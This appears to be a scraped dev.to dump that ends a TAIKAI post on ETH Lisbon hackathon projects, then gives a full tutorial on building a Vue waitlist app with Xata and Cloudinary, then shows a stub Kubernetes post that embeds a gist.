The project's concept is based on users receiving a membership card and accumulating loyalty points by completing on-chain and off-chain quests.
In exchange, they receive a customizable NFT membership, granting users social status and increasing their sense of belonging to a brand community.
There is a utility shop on the widget where users can spend points to get perks and exclusive benefits.

### [Multi Resolver Snap](https://taikai.network/ethlisbon/hackathons/ethlisbon-2022/projects/cl9v6ct2h110026501talhki7i6s/idea)
The Multi Resolver Snap project provides a solution for creating a friendlier web3 environment for both users and developers.
The author's idea was to create a snap on MetaMask that allows users to send cryptocurrency in a more straightforward manner. It is possible to send crypto to almost anything using Multi Resolver, such as Twitter names, emails, or phone numbers. In other words, this snap enables users to convert any such handle to an address and send value transactions.
According to the author of the project: “This multi-resolver MetaMask Snap enables dApps to send transactions to string-type handles that can take on a multitude of origins.
Instead of integrating multiple domain services and resolvers individually, dApps can now simply call this snap and let MetaMask do the rest”.

### [Authsome](https://taikai.network/ethlisbon/hackathons/ethlisbon-2022/projects/cl9tv1epm14319401w1mf7ltuhm/idea)
This project won the Fuel Labs bounty at ETH Lisbon. Authsome creates a multi-signature wallet with the Fuel Virtual Machine (FuelVM) predicate system and the Sway programming language (Fuel's own domain-specific language).
This multi-signature wallet is then used to power a pluggable authentication infrastructure, much like Web3Auth works.

Here’s how it works:
The user logs in to Authsome using their email and password. Then, Authsome generates three keys automatically: one is password-encrypted and sent to the backend service; another is stored in the browser's local storage; the third is saved in a file for manual recovery. Following that, the user can make payments.
For the ones who do not know Fuel, it is a fast execution layer for modular blockchains, and FuelVM is one of the central technology pillars, designed to reduce wasteful processing in traditional blockchain virtual machine architectures.
## Final Thoughts

ETH Lisbon hackathon was incredibly fun, exciting and competitive. These challenges provide a space for developers, innovators and enthusiasts to brainstorm ideas and develop projects that help the web3 space grow.
This hackathon was also an excellent validation that hackathons are here to stay. We learned a lot from these projects and shared a glimpse of the obstacles, iterations and opportunities available right now.
Now it's up to you! Browse our hackathons page and start building today.
## Host hackathons at TAIKAI
TAIKAI's hackathon platform is the perfect place to host your web3 hackathon.
No matter if the hackathon is online or hybrid, we can help you drive innovation and engagement.
Here's a glimpse of what our platform offers:
- Simple communication among all parties involved: organizers, participants, and mentors;
- Logical and user-friendly hackathon page for organizing and presenting content, rules, prizes, timeline, and updates;
- Matchmaking system: Allow participants to team up and form groups based on each one's abilities;
- Submission projects: Enable rich formats in project submissions including images, videos, and attachments;
- Live streaming: Broadcast content, such as lectures and workshops;
- Transparent voting system: Tokens are used to evaluate projects, ensuring transparency and equal opportunities.
### Request a demo today and take your hackathon to the next level. | carlosmendes |
1,270,883 | Build a Waitlisting Application in Vue using Xata and Cloudinary | For many reasons, businesses start their introduction to the market by launching a waitlist.... | 0 | 2022-11-24T15:55:37 | https://dev.to/hackmamba/build-a-waitlisting-application-in-vue-using-xata-and-cloudinary-1anf | vue, xata, cloudinary, javascript | For many reasons, businesses start their introduction to the market by launching a waitlist. Universities and medical institutions are known for having waitlists for admissions and surgeries, respectively.
This article will discuss building a waitlisting application in Vue using Cloudinary and Xata.
[Cloudinary](https://cloudinary.com/signup?utm_source=hackmamba&utm_campaign=hackmamba-hackathon&utm_medium=hackmamba-blog) is a cloud-based video and image management platform that offers services for managing and transforming uploaded assets for usage on the web.
Xata is a [Serverless Data platform](https://xata.io/docs/intro/serverless-data-platform?utm_source=hackmamba&utm_campaign=hackmamba-hackathon&utm_medium=hackmamba-blog) that simplifies how developers work with data by providing the power of a traditional database with the usability of a SaaS spreadsheet app.
## GitHub
Check out the complete source code [here](https://github.com/MoeRayo/xata-cloudinary-waitlist).
## Netlify
We can access the live demo [here](https://phenomenal-sunburst-10b96a.netlify.app).
## Prerequisite
Understanding this article requires the following:
- Installation of Node.js
- Basic knowledge of JavaScript
- A Cloudinary account (sign up [here](https://cloudinary.com/signup?utm_source=hackmamba&utm_campaign=hackmamba-hackathon&utm_medium=hackmamba-blog))
- Creating a free account with [Xata](https://xata.io?utm_source=hackmamba&utm_campaign=hackmamba-hackathon&utm_medium=hackmamba-blog)
## Creating a Vue app
Using the `vue create <project-name>` command, we will create a new Vue app.
The process of scaffolding the project would provide a list of options, which could look like this:

We can start our Vue application by running the following command:
```bash
cd <project name>
npm run serve
```
Vue will, in turn, start a hot-reloading development environment accessible by default at `http://localhost:8080`.
## Styling
The CSS framework to be used in this project is [Tachyons CSS](https://tachyons.io/). Install it by running the command below in the terminal.
```bash
npm i tachyons
```
Afterward, make it globally available for usage in the project by adding the line below in our `src/main.js`:
```javascript
import 'tachyons/css/tachyons.css';
```
## Creating a Xata Database
To create a database on Xata, we must either log into our account or create a new [account](https://xata.io?utm_source=hackmamba&utm_campaign=hackmamba-hackathon&utm_medium=hackmamba-blog). Next, we will go to the user dashboard's database tab to create an appropriate database.

We will create a new table within the database and add the appropriate records/fields that we want the table to have. In the case of the solution we are building, we will create a `signups` table with three fields: `firstname`, `lastname`, and `email`.
These fields signify the data we will track in our application before saving it to the database.

## Setting up Xata in our Vue application
### Installing Xata CLI
We will first need to install Xata CLI on our machine. To do this, we will open the command line terminal as an administrator and run the command below.
```bash
npm install -g @xata.io/cli@latest
```
### Installing Xata in our project
To use Xata in our project, we will install the Xata software development kit (SDK) from the command line like so:
```bash
npx xata
```
After this, we can then initialize Xata for use in our application by running the command below:
```bash
xata init
```
Xata will present us with a variety of options to choose from. In the end, Xata will generate some files for usage, among which are the `.xatarc` and `.env` files.
We will need to rename the Xata API key variable in the generated `.env` file to the one below, because Vue CLI only exposes environment variables prefixed with `VUE_APP_` to the application.
```bash
VUE_APP_XATA_API_KEY="add your api key"
```
## Cloudinary Setup
For our application's asset management, if you haven't already, you need to create an account with Cloudinary by clicking [**here**](https://cloudinary.com?utm_source=hackmamba&utm_campaign=hackmamba-hackathon&utm_medium=hackmamba-blog). Creating an account is entirely free.
We will need to install the [Cloudinary Vue.js SDK](https://cloudinary.com/documentation/vue_integration?utm_source=hackmamba&utm_campaign=hackmamba-hackathon&utm_medium=hackmamba-blog) with the command below before configuring it in your Vue app.
```bash
npm install cloudinary-vue
```
We will need to configure the installed SDK in our Vue app by navigating to the `main.js` and adding the following to the file.
```javascript
import Cloudinary from "cloudinary-vue";
Vue.use(Cloudinary, {
configuration: {
    cloudName: "XXX", // add your Cloudinary cloud name here
    secure: true,
  },
});
```
Our waitlist will have an image, which we will upload to Cloudinary. In this case, we used this image by [Hannah Busing](https://unsplash.com/photos/4J16oO4MmXs?utm_source=unsplash&utm_medium=referral&utm_content=creditShareLink).
## Adding the landing page image
We want our waitlist application to have the image we uploaded to Cloudinary. To do this, we will create a file named `components/TheCloudinaryBackground.vue` and add the code below:
```vue
<template>
<cld-image publicId="hannah-busing-unsplash" dpr="auto" class="dn db-l w-50-ns vh-100" quality= "auto">
<cld-transformation flags="rasterize" />
</cld-image>
</template>
<script>
export default {
name: "TheCloudinaryBackground",
}
</script>
```
From the above, we achieved the following:
- Cloudinary provides several ready-made components for use in our Vue app, two of which — `<cld-image />` and `<cld-transformation />` — we used to render and transform the background image
- Passed in the `publicId` of the Cloudinary file we will be using, which is named `hannah-busing-unsplash`
- Cloudinary components support asset transformations, which we leveraged by adding attributes like `dpr`, set to a value of `auto`. The `dpr` attribute ensures that users receive images matched to their device's pixel ratio (DPR) and size.
To render this template, we will need to import it into the `views/HomeView.vue` file like so:
```vue
<template>
<div class="flex-l flex-row-l justify-center justify-between-l">
<TheCloudinaryBackground />
</div>
</template>
<script>
import TheCloudinaryBackground from "@/components/TheCloudinaryBackground.vue";
export default {
components: {
TheCloudinaryBackground,
}
}
</script>
```
## Creating the waitlisting form
The waitlisting application is incomplete without the form where interested candidates can register.
To create this form, we will create a `components/TheWaitlistForm.vue` file and add the code below.
```vue
<template>
<div class="bg-waitlist vh-100 w-50-ns w-100-m">
<div class="w-70 center pv6">
<h3 class="f2 f1-m f-headline-l measure-narrow lh-title mv0">
<span class="lh-copy brown pa1 tracked-tight">
Joinr.
</span>
</h3>
<h4 class="f5 fw1 lh-copy georgia i mt0">
Be one of the first to access our service!
</h4>
<p></p>
<form @submit.prevent="submitForm">
<label for="firstname" class="db mb2 brown b georgia">First Name</label>
<input type="text" class="db w-80 w-60-m pa2 br2 mb3 ba bw1 b--brown" name="firstname" id="firstname" v-model="firstname" placeholder="First name">
<label for="lastname" class="db mb2 brown b georgia">Last Name</label>
<input type="text" class="db w-80 w-60-m pa2 br2 mb3 ba bw1 b--brown" name="lastname" id="lastname" v-model="lastname" placeholder="Last name">
<label for="email" class="db mb2 brown b georgia">Email</label>
<input type="email" class="db w-80 w-60-m pa2 br2 mb4 ba bw1 b--brown" name="email" id="email" v-model="email" placeholder="Email">
<div class="w-100">
<button type="submit" class="f6 ttu tracked black-80 bg-brown pa3 br3 white bb link b--brown hover-white dim bg-animate pointer">Join waitlist</button>
</div>
</form>
</div>
</div>
</template>
<script>
export default {
data: () => ({
firstname: "",
lastname: "",
email: ""
})
}
</script>
```
From the code block above, we achieved the following:
- Created a functional form to handle interested candidates' input for the waitlist
- Added the `data` in the Vue script to manage the names and email of the people who will fill out the form
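One detail worth noting: the form submits whatever the user typed. A small client-side check before creating the Xata record keeps empty or obviously malformed entries out of the `signups` table. The helper below is an illustrative addition, not part of the original tutorial, and its email regex is a deliberately loose sketch rather than an RFC-compliant validator:

```javascript
// Minimal client-side validation for the three waitlist fields.
function validateSignup({ firstname, lastname, email }) {
  const errors = [];
  if (!firstname || !firstname.trim()) errors.push("First name is required");
  if (!lastname || !lastname.trim()) errors.push("Last name is required");
  if (!/^[^\s@]+@[^\s@]+\.[^\s@]+$/.test(email || "")) {
    errors.push("A valid email is required");
  }
  return errors; // an empty array means the record is safe to submit
}

console.log(validateSignup({
  firstname: "Ada", lastname: "Lovelace", email: "ada@example.com"
})); // []
```

A method like this could be called at the top of `submitForm`, returning early (and showing the errors) whenever the array is non-empty.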
To render this template, we will need to import it into the `views/HomeView.vue` file. Together with the imported Cloudinary background, our `views/HomeView.vue` file should be like the below:
```vue
<template>
<div class="flex-l flex-row-l justify-center justify-between-l">
<TheCloudinaryBackground />
<TheWaitlistForm />
</div>
</template>
<script>
import TheCloudinaryBackground from "@/components/TheCloudinaryBackground.vue";
import TheWaitlistForm from "@/components/TheWaitlistForm.vue";
export default {
components: {
TheCloudinaryBackground,
TheWaitlistForm
}
}
</script>
```
At this stage, our page should look like the below:

## Creating the success page
We want to ensure that on successfully adding the user's details to the waitlist, the user gets directed to a confirmation page. For this, we will create a file called `views/SuccessView.vue` and add the code below:
```vue
<template>
<div class="bg-waitlist vh-100">
<div class="w-60-l w-80-m w-100 center tc pv6 ph3">
<h3 class="f1 measure-narrow lh-title mv0">
<span class="lh-copy brown pa1 tracked-tight">
You are now on the waitlist
</span>
</h3>
<h4 class="f5 fw1 lh-copy georgia i mt0">
We will reach out to you soon with juicy updates!
</h4>
<a href="/" class="db link f6 ttu tracked black-80 bg-brown pv3 br3 white bb link b--brown hover-white dim bg-animate pointer mt5 w-70 w-30-ns center">
Go To Home
</a>
</div>
</div>
</template>
```
From the code block above, we were able to achieve the following:
- Created a success page which the user gets directed to
- Added a button that takes the user back to the home page
Our waitlist confirmation page should look like the following:

## Submitting waitlist
We must submit the form data from interested people into the `signups` table in our previously created Xata database. To do this, we will add the code below to the script tag of the `components/TheWaitlistForm.vue` file.
```javascript
<script>
import { getXataClient } from '@/xata'
export default {
data: () => ({
// data goes here
}),
methods: {
async submitForm() {
const xata = getXataClient()
await xata.db.signups.create({
firstname: this.firstname,
lastname: this.lastname,
email: this.email
}).then(() => {
this.$router.push({path:`/success`})
})
}
}
}
</script>
```
From the code block above, we achieved the following:
- Imported the Xata client
- Created a new record for the user on the Xata database
- At successful record creation, the user's view gets changed to the waitlist confirmation page
At this point, our waitlist application should look like the below:

## Conclusion
This article discusses how to build a waitlisting application using Cloudinary and Xata. Cloudinary was used for asset management and image transformation, while we used Xata for storing user details.
## Resources
- [Xata.io documentation](https://xata.io/docs/overview?utm_source=hackmamba&utm_campaign=hackmamba-hackathon&utm_medium=hackmamba-blog)
- [Cloudinary transformation reference](https://cloudinary.com/documentation/transformation_reference?utm_source=hackmamba&utm_campaign=hackmamba-hackathon&utm_medium=hackmamba-blog)
| moerayo |
1,270,923 | Kubernetes Concepts: Deep Dive | A post by Idan Refaeli | 0 | 2022-11-24T16:33:30 | https://dev.to/idanref/kubernetes-concepts-deep-dive-50en | kubernetes, docker, devops, cloud | {% embed https://gist.github.com/Idanref/ae90166b055f651bb72ef1bd8cd52b97 %} | idanref |